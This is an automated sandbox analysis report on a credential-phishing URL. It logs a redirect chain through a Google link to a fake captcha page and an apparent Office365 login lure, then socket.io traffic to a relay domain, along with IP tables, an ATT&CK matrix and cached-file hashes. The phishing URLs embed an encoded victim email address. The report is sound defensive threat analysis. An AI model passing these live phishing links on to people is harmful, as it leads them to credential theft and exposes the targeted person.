          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
          Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
          Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
          Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
          Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
          Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49777 version: TLS 1.2
          Source: classification engineClassification label: mal96.phis.win@18/38@26/13
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2004,i,6732713318818398282,15989953615233870441,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2004,i,6732713318818398282,15989953615233870441,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
          Process Injection
          1
          Process Injection
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20100%SlashNextCredential Stealing type: Phishing & Social Engineering
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://www.hostgator.com.br0%VirustotalBrowse
          https://cdn.socket.io/4.6.0/socket.io.min.js0%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          d2vgu95hoyrpkh.cloudfront.net
          18.245.31.89
          truefalse
            unknown
            rieg.riegriegrieg.com
            192.185.209.0
            truetrue
              unknown
              cs837.wac.edgecastcdn.net
              192.229.133.221
              truefalse
                unknown
                www.google.co.uk
                172.217.16.195
                truefalse
                  unknown
                  s-part-0017.t-0009.t-msedge.net
                  13.107.246.45
                  truefalse
                    unknown
                    sni1gl.wpc.omegacdn.net
                    152.199.21.175
                    truefalse
                      unknown
                      www.google.com
                      142.250.184.196
                      truefalse
                        unknown
                        sandoom2notnt.com
                        188.114.97.3
                        truefalse
                          unknown
                          taxigiarebienhoa.vn
                          103.255.237.40
                          truefalse
                            unknown
                            s-part-0032.t-0009.t-msedge.net
                            13.107.246.60
                            truefalse
                              unknown
                              fp2e7a.wpc.phicdn.net
                              192.229.221.95
                              truefalse
                                unknown
                                windowsupdatebg.s.llnwi.net
                                87.248.204.0
                                truefalse
                                  unknown
                                  aadcdn.msftauth.net
                                  unknown
                                  unknownfalse
                                    unknown
                                    www.w3schools.com
                                    unknown
                                    unknownfalse
                                      unknown
                                      cdn.socket.io
                                      unknown
                                      unknownfalse
                                        unknown
                                        NameMaliciousAntivirus DetectionReputation
                                        https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20false
                                          unknown
                                          https://sandoom2notnt.com/socket.io/?EIO=4&transport=polling&t=PB7beRv&sid=JMhweoIWN1gqZtHIAAXffalse
                                            unknown
                                            https://sandoom2notnt.com/socket.io/?EIO=4&transport=polling&t=PB7bfLd&sid=JMhweoIWN1gqZtHIAAXffalse
                                              unknown
                                              https://www.google.co.uk/amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20false
                                                unknown
                                                https://rieg.riegriegrieg.com/favicon.icotrue
                                                  unknown
                                                  https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svgfalse
                                                    unknown
                                                    https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123Ntrue
                                                      unknown
                                                      https://www.w3schools.com/w3css/4/w3.cssfalse
                                                        unknown
                                                        https://sandoom2notnt.com/socket.io/?EIO=4&transport=polling&t=PB7bdZXfalse
                                                          unknown
                                                          https://sandoom2notnt.com/socket.io/?EIO=4&transport=websocket&sid=JMhweoIWN1gqZtHIAAXffalse
                                                            unknown
                                                            https://cdn.socket.io/4.7.5/socket.io.min.jsfalse
                                                              unknown
                                                              https://rieg.riegriegrieg.com/n/jsnom.jstrue
                                                                unknown
                                                                https://sandoom2notnt.com/socket.io/?EIO=4&transport=polling&t=PB7beRs&sid=JMhweoIWN1gqZtHIAAXffalse
                                                                  unknown
                                                                  http://taxigiarebienhoa.vn/favicon.icofalse
                                                                    unknown
                                                                    http://taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20false
                                                                      unknown
                                                                      https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFMW5halE9JnVpZD1VU0VSMDkxMDIwMjRVNDQxMDA5MjE=N0123N#Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20true
                                                                        unknown
                                                                        https://sandoom2notnt.com/socket.io/?EIO=4&transport=polling&t=PB7bfLc&sid=JMhweoIWN1gqZtHIAAXffalse
                                                                          unknown
                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                          https://cdn.socket.io/4.6.0/socket.io.min.jschromecache_73.2.dr, chromecache_67.2.drfalseunknown
                                                                          https://www.hostgator.com.brchromecache_76.2.drfalseunknown
                                                                          https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffcchromecache_73.2.dr, chromecache_67.2.drfalse
                                                                            unknown
                                                                            https://google.comchromecache_73.2.dr, chromecache_67.2.drfalse
                                                                              unknown
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              142.250.184.196
                                                                              www.google.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              192.185.209.0
                                                                              rieg.riegriegrieg.comUnited States
                                                                              46606UNIFIEDLAYER-AS-1UStrue
                                                                              13.107.246.45
                                                                              s-part-0017.t-0009.t-msedge.netUnited States
                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                              18.245.31.89
                                                                              d2vgu95hoyrpkh.cloudfront.netUnited States
                                                                              16509AMAZON-02USfalse
                                                                              18.245.31.78
                                                                              unknownUnited States
                                                                              16509AMAZON-02USfalse
                                                                              192.229.133.221
                                                                              cs837.wac.edgecastcdn.netUnited States
                                                                              15133EDGECASTUSfalse
                                                                              13.107.246.60
                                                                              s-part-0032.t-0009.t-msedge.netUnited States
                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                              103.255.237.40
                                                                              taxigiarebienhoa.vnViet Nam
                                                                              45899VNPT-AS-VNVNPTCorpVNfalse
                                                                              239.255.255.250
                                                                              unknownReserved
                                                                              unknownunknownfalse
                                                                              188.114.97.3
                                                                              sandoom2notnt.comEuropean Union
                                                                              13335CLOUDFLARENETUSfalse
                                                                              152.199.21.175
                                                                              sni1gl.wpc.omegacdn.netUnited States
                                                                              15133EDGECASTUSfalse
                                                                              172.217.16.195
                                                                              www.google.co.ukUnited States
                                                                              15169GOOGLEUSfalse
                                                                              IP
                                                                              192.168.2.4
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1542728
                                                                              Start date and time:2024-10-26 08:47:34 +02:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 3m 20s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:browseurl.jbs
                                                                              Sample URL:https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:8
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal96.phis.win@18/38@26/13
                                                                              EGA Information:Failed
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 0
                                                                              • Number of non-executed functions: 0
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 142.250.186.163, 172.217.16.142, 64.233.184.84, 34.104.35.123, 4.175.87.197, 172.217.18.10, 142.250.186.170, 216.58.206.74, 216.58.212.138, 172.217.16.202, 142.250.185.138, 142.250.186.106, 142.250.186.138, 142.250.185.106, 142.250.184.234, 142.250.185.234, 142.250.185.170, 142.250.185.202, 142.250.184.202, 142.250.185.74, 172.217.23.106, 87.248.204.0, 216.58.212.163, 142.250.186.99, 192.229.221.95, 13.95.31.18, 172.217.23.99
                                                                              • Excluded domains from analysis (whitelisted): logincdn.msauth.net, lgincdnmsftuswe2.azureedge.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, clientservices.googleapis.com, clients2.google.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, www.gstatic.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, aadcdnoriginwus2.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com
                                                                              • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              No simulations
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                                                              Category:dropped
                                                                              Size (bytes):2407
                                                                              Entropy (8bit):7.900400471609788
                                                                              Encrypted:false
                                                                              SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                                                              MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                                                              SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                                                              SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                                                              SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                                                              Category:dropped
                                                                              Size (bytes):276
                                                                              Entropy (8bit):7.316609873335077
                                                                              Encrypted:false
                                                                              SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                                                              MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                                                              SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                                                              SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                                                              SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                              Category:dropped
                                                                              Size (bytes):1435
                                                                              Entropy (8bit):7.8613342322590265
                                                                              Encrypted:false
                                                                              SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                              MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                              SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                              SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                              SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (49854)
                                                                              Category:dropped
                                                                              Size (bytes):49993
                                                                              Entropy (8bit):5.216475744251136
                                                                              Encrypted:false
                                                                              SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                                                              MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                                                              SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                                                              SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                                                              SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                                                              Category:dropped
                                                                              Size (bytes):199
                                                                              Entropy (8bit):6.766983163126765
                                                                              Encrypted:false
                                                                              SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                                                              MD5:21B761F2B1FD37F587D7222023B09276
                                                                              SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                                                              SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                                                              SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:SVG Scalable Vector Graphics image
                                                                              Category:downloaded
                                                                              Size (bytes):1636
                                                                              Entropy (8bit):4.214613323368661
                                                                              Encrypted:false
                                                                              SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                                                              MD5:F7AB697E65B83CE9870A4736085DEEEC
                                                                              SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                                                              SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                                                              SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg
